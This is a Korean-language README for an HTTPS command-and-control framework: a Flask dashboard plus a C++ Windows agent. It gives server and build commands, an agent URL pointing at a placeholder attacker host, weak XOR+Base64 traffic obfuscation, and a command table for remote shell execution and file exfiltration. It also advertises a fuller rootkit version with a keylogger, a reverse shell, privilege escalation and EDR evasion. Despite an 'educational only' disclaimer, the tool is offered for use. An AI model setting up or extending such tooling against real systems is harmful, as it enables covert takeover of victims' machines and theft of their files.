
암호화된 비콘, 웹 대시보드 및 Windows 에이전트를 갖춘 HTTPS C&C 프레임워크.

HTTPS 명령 및 제어 인프라로, 원격 Windows 에이전트 관리를 위한 웹 대시보드를 제공합니다.
⚠️ 교육용 전용 - 불법 사용은 본인의 책임입니다.
서버:
cd server
pip install flask
python c2_server.py
대시보드 접속: https://localhost:8443
클라이언트:
build.bat
서버 IP를 설정하려면 client/c2_client.cpp를 편집하세요:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
암호화: XOR + Base64
키: Hostname + Username + "SecretKey2025"
전송: HTTPS (포트 8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
서버: Python 3.9+, Flask
클라이언트: MinGW-w64 GCC 15.2+, Windows SDK, C++17
이 C2 프레임워크는 XvX Usermode Rootkit 프로젝트에서 추출되었습니다. 전체 루트킷 버전에는 프로세스/파일/레지스트리 숨기기, SYSTEM 권한 상승, 대화형 리버스 셸, 키로거 기능, DLL 인젝션 및 EDR 회피 기술을 포함한 15개 이상의 명령어를 갖춘 더 완전한 C2가 포함되어 있습니다. 이 독립형 버전은 교육 목적과 사용자 정의 프로젝트에 쉽게 통합할 수 있도록 핵심 C2 인프라를 제공합니다.
저자: 28zaakypro[@]proton[.]me
| 명령어 | 구문 | 설명 |
|---|
shell | shell <cmd> | 셸 명령 실행 |
exfil | exfil <path> | 파일 유출 (Base64) |
sleep | sleep <seconds> | 비콘 간격 변경 |
ping | ping | 연결 테스트 |
die | die | 에이전트 종료 |